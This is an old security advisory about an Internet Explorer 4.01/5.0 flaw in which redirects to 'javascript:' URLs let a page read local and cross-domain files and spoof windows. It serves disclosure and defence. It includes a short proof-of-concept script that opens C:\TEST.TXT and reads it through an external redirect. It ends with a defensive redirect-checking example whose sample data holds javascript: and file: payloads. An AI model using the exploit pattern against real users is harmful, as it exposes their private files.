COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 4.01, 5.0

PROBLEM

    Georgi Guninski found the following.  IE 5.0 allows reading local
    files (and files from any domain) and window spoofing using HTTP
    redirection to "javascript:".

    Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (Win98 is
    presumably vulnerable too) allows reading local files and
    text/HTML files from any domain.  Window spoofing is possible.
    It is also possible in some cases to read files behind a firewall.

    The problem is an HTTP redirect to "javascript:" URLs.  If you
    open a local file and then change its location to a URL that
    redirects to "javascript:JavaScript code", the JavaScript code is
    executed in the security context of the original local file and
    has access to its DOM.  The local file may be sent to an arbitrary
    server.  Window spoofing may be done in a similar way.  This
    vulnerability may be exploited using an HTML email message or a
    newsgroup posting.  The code is:

        <SCRIPT>
        alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a dialog box");
        a=window.open("file://c:/test.txt");
        a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
        </SCRIPT>
        // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)"

    A demonstration is available at:

        http://www.nat.bg/~joro/jsredir1.html

SOLUTION

    Workaround: Disable Active Scripting.  Patch availability:

        - http://www.microsoft.com/downloads
        - http://www.microsoft.com/msdownload/iebuild/jsredir/en/jsredir.htm

    NOTE: The IE 4.01 patch requires IE 4.01 SP2 in order to install.
    IE 4.01 SP2 is available at:

        http://www.microsoft.com/Windows/ie/download/windows.htm

    NOTE: The patch will be available shortly via the WindowsUpdate
    site.
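
    The root cause described under PROBLEM is a redirect whose Location
    header carries a non-HTTP scheme.  The following is an added example,
    not code from the advisory or from the vendor patch: a check that a
    client or filtering proxy could apply to redirect responses.  The
    function names, the allow-list and the sample records are assumptions
    constructed for illustration.

```javascript
// Added example: refuse redirects whose target is not http(s).
// ALLOWED_SCHEMES, checkRedirect and flagRedirects are hypothetical names.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Resolve a Location header against the URL that returned it.
// The WHATWG URL parser strips leading whitespace/control characters,
// drops embedded tabs/newlines and lowercases the scheme, so an
// obfuscated " JaVa\tScript:" is still classified as "javascript:".
function checkRedirect(requestUrl, locationHeader) {
  let target;
  try {
    target = new URL(locationHeader, requestUrl);
  } catch (e) {
    return { follow: false, scheme: null, reason: "unparseable Location" };
  }
  if (!ALLOWED_SCHEMES.has(target.protocol)) {
    return { follow: false, scheme: target.protocol,
             reason: "redirect to non-HTTP scheme" };
  }
  return { follow: true, scheme: target.protocol, reason: "ok" };
}

// Return the 3xx records whose redirect target must not be followed.
function flagRedirects(records) {
  return records
    .filter(r => r.status >= 300 && r.status < 400 && r.location !== undefined)
    .map(r => ({ url: r.url, ...checkRedirect(r.url, r.location) }))
    .filter(r => !r.follow);
}

// Constructed sample response records (not captured traffic).
const SAMPLE = [
  { url: "http://site.example/a", status: 302, location: "/b" },
  { url: "http://site.example/redir.cgi?x", status: 302,
    location: "javascript:alert(document.body.innerText)" },
  { url: "http://site.example/redir.cgi?y", status: 301,
    location: " JaVa\tScript:void(0)" },
  { url: "http://site.example/c", status: 200, location: undefined },
  { url: "http://site.example/d", status: 302, location: "file:///c:/test.txt" },
];

for (const hit of flagRedirects(SAMPLE)) {
  console.log(`${hit.url} -> ${hit.scheme} (${hit.reason})`);
}
```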